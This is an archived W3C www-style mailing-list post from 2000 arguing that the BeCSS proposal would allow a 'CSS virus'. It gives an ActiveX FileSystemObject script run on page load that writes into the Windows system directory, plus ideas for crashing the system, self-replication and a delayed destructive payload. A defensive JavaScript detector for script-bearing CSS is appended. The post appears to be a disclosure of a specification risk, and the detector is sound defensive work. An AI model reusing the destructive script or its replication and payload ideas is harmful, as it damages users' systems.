- From: Matthew Brealey <webmaster@richinstyle.com>
- Date: Thu, 03 Aug 2000 17:00:16 +0100
- To: www-style@w3.org
I wrote:
>
> Bruno wrote:
> >
> > I was just wondering where there or is there any CSS virus?
>
> Using the BeCSS proposal it is possible to format your hard drive. This
> can be achieved by setting as the element's 'behavior' the instantiation
> of an ActiveX control. ActiveX controls can do anything - in
> particular the execution of an external program - such a program might
> be one that trashes your hard drive's partition tables (only possible on
> IDE drives).
>
> However, this is a problem not limited to CSS, and is really a problem
> with ActiveX.

Here is my attempt at writing a CSS virus. Here's a script:

    script
    obj = new ActiveXObject("Scripting.FileSystemObject");
    obj.CreateTextFile("c:\\windows\\system\\user.exe");
    thing=obj.GetFile("c:\\windows\\system\\user.exe");
    /script

(<> removed in case it kills anyone's system)

This will currently destroy anyone's system (note: this is hardcoded for Win9x - a better version would work for other directory names; other files would work just as well), if it is placed in a web page and

- the user has selected 'low security' (this will destroy it automatically)
- the user has selected 'medium security' and they select 'Yes' in response to the question: 'An ActiveX control on this page might be unsafe to interact with other parts of the page. Do you want to allow this interaction?'
- the user has selected 'medium security' (default) and the script is signed

It would be embedded as CSS thus:

    style type="text/css" add <>
    @script {
      function screw() {
        TriStateFalse=0;
        ForWriting=2;
        obj = new ActiveXObject("Scripting.FileSystemObject");
        obj.CreateTextFile("c:\\windows\\system\\user.exe");
        thing=obj.GetFile("c:\\windows\\system\\user.exe");
      }
    }
    body {onload: "screw()"}
    </style>

(To crash the system immediately, overwrite the swap file as well.)

Unfortunately it doesn't really qualify as a virus, more a trojan horse, but I was unable to get it to work as a virus - I tried adding:

    TriStateFalse=0;
    ForWriting=2;
    doit=thing.OpenAsTextStream(ForWriting, TristateFalse);
    doit.Write("viruscodehere");
    doit.Close();

but it didn't work.

Obviously, even if this code worked, it would need significant enhancements:

- to replicate well, it should go through each HTML file on the system (although not all at once)
- it needs a payload: this could easily be done - add a cookie and after a certain number of runs (to ensure maximum replication of the virus) trash the system

To work, this requires:

- a browser supporting BeCSS
- the Windows Scripting Host
- Internet Explorer

Thus, I believe it is possible to produce a CSS virus, which is not cool at all, particularly in view of the stuff in CSS1 about CSS not becoming a programming language (it didn't say CSS wouldn't become a virus, but I suppose that was obvious).

-----------------------------------
Please visit http://RichInStyle.com. Featuring:
MySite: customizable styles. AlwaysWork style
Browser bug table covering all CSS2 with links to descriptions.
Lists of > 1000 browser bugs
Websafe Colorizer
CSS2, CSS1 and HTML4 tutorials. CSS masterclass
CSS2 test suite: 5000++ tests and 300+ test pages.

Received on Thursday, 3 August 2000 12:01:05 UTC
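
Added example, not part of the original post or of any project it mentions: a JavaScript check that a site accepting style sheets from users could run, flagging the script-bearing constructs the message names (an `@script` block, `on*` event properties such as `onload`, and the `behavior` property). The function names and the sample sheet are hypothetical, and the sample is constructed and inert; comments are stripped and CSS escapes decoded first so that a rewritten name such as `beh\61vior` is still matched.

```javascript
// Added example (not from the original post). Names below are hypothetical;
// only "@script", on* properties and "behavior" come from the message.
const RULES = [
  { kind: "at-script", re: /(@script)\b/gi },
  { kind: "behavior-property", re: /[{;]\s*(behavior)\s*:/gi },
  { kind: "event-property", re: /[{;]\s*(on[a-z]+)\s*:/gi },
];

// Blank out /* ... */ comments, keeping newlines so line numbers stay right.
function stripComments(css) {
  return css.replace(/\/\*[\s\S]*?\*\//g, (c) => c.replace(/[^\n]/g, " "));
}

// Resolve CSS backslash escapes so "beh\61vior" is matched as "behavior".
function decodeEscapes(css) {
  return css.replace(/\\(?:([0-9a-f]{1,6})[ \t]?|([^\n]))/gi, (m, hex, ch) => {
    if (hex === undefined) return ch; // simple escape: keep the character
    const cp = parseInt(hex, 16);
    const ok = cp > 0 && cp <= 0x10ffff && cp !== 0x0a;
    return ok ? String.fromCodePoint(cp) : " "; // never add a line break
  });
}

function findScriptBearingCss(css) {
  const text = decodeEscapes(stripComments(css));
  const findings = [];
  for (const { kind, re } of RULES) {
    for (const m of text.matchAll(re)) {
      const offset = m.index + m[0].lastIndexOf(m[1]);
      const line = text.slice(0, offset).split("\n").length;
      findings.push({ kind, name: m[1].toLowerCase(), line, offset });
    }
  }
  return findings.sort((a, b) => a.offset - b.offset);
}

// Constructed, inert sample: one commented-out rule plus three live ones.
const SAMPLE = [
  "/* constructed sample, inert; behavior: none */",
  "@script { function hello() {} }",
  'body { color: black; onload: "hello()" }',
  "p { beh\\61vior: url(x.htc) }",
  "a:hover { color: red }",
].join("\n");

for (const f of findScriptBearingCss(SAMPLE)) {
  console.log(`line ${f.line}: ${f.kind} (${f.name})`);
}
```

A sheet with any finding is best rejected outright rather than rewritten, since a partial strip can leave a construct the parser still accepts.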